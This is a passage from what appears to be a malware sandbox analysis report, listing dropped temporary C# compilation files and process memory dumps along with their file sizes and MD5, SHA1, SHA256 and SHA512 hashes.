f48ac7dfbfda82c97609716a05853d14

SHA1
fe9e419ae14375eaaf0963be6c954649c238db09

SHA256
1d749ded5523936dd849bba0e45f692d0f772fe58e01d75f42e5fb8644cf2bcd

SHA512
7baf96cf72e5bd56aac778be21f9886ccdaa8e1cd30d05d09392362bc385ce66a8ab26831a8228729485211898d359f9c235ef890c3e9425a46d0b54e4bed534

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mctnrend\mctnrend.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mctnrend\mctnrend.cmdline

Filesize
369B

MD5
212306e615dad0968457af27a94ae92c

SHA1
5e71813de6e6dc23816cac9f7d31c055135e65e2

SHA256
7349202208eb796aa93c4094ee1b8db13bdf7608f445e7c42124f8d3dc6d51d0

SHA512
6d78ff17af372237223360c0f44ff02b1279da4af779c33c1408dcb466506681be60628f6df10af0f86102abc46c90fbd1d7377fb0b9b8355c824ee733d6d0ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w0mmhcwn\CSC818140766A5C469DBC3C62159FB5524.TMP

Filesize
652B

MD5
78a4c9e2e691607e82e1cfde039cc162

SHA1
38e9c574f3591c335ee1ac76f71453b05a7c6ddf

SHA256
6870c02ab68204d57e74325acb5c0da6f618ef0374802c7c891cc451d701f460

SHA512
e744cfd77578192339386a2f1ea4b255bfff668c742b5e07e2bbfb697c29da2a20ab9384fcd641f4c04b5cfb0c59361b35f9ace1a475d5c6445c74567873f393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w0mmhcwn\w0mmhcwn.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w0mmhcwn\w0mmhcwn.cmdline

Filesize
369B

MD5
c92fb2951a2884189fd4d2ea33b8cad6

SHA1
0cfb61840d77c74da6e8b9d630c2141ae4266362

SHA256
2c1b61bcc010365793c12e9e1f9e4cc2e597443775dad05eb08fff5c067433a1

SHA512
c3de254803a46ac3dc0cf93e0546ce4825a317739af94af32ee87723170f24be0853f8e7fd823e3e5e19f12670357c89f64841da58854dc631310700590eefd6

Download Submit
memory/1492-117-0x000001625E750000-0x000001625E7A0000-memory.dmp

Filesize
320KB

Download
memory/2128-185-0x000001ECB2240000-0x000001ECB2248000-memory.dmp

Filesize
32KB

Download
memory/5036-85-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

Filesize
10.8MB

Download
memory/5036-104-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

Filesize
10.8MB

Download
memory/5036-100-0x000002A407A20000-0x000002A407A28000-memory.dmp

Filesize
32KB

Download
memory/5036-87-0x000002A422450000-0x000002A4224C6000-memory.dmp

Filesize
472KB

Download
memory/5036-86-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

Filesize
10.8MB

Download
memory/5036-84-0x000002A421FF0000-0x000002A422034000-memory.dmp

Filesize
272KB

Download
memory/5036-83-0x00007FFAE3680000-0x00007FFAE4141000-memory.dmp

Filesize
10.8MB

Download
memory/5036-73-0x000002A421E30000-0x000002A421E52000-memory.dmp

Filesize
136KB

Download
memory/5036-72-0x00007FFAE3683000-0x00007FFAE3685000-memory.dmp

Filesize
8KB

Download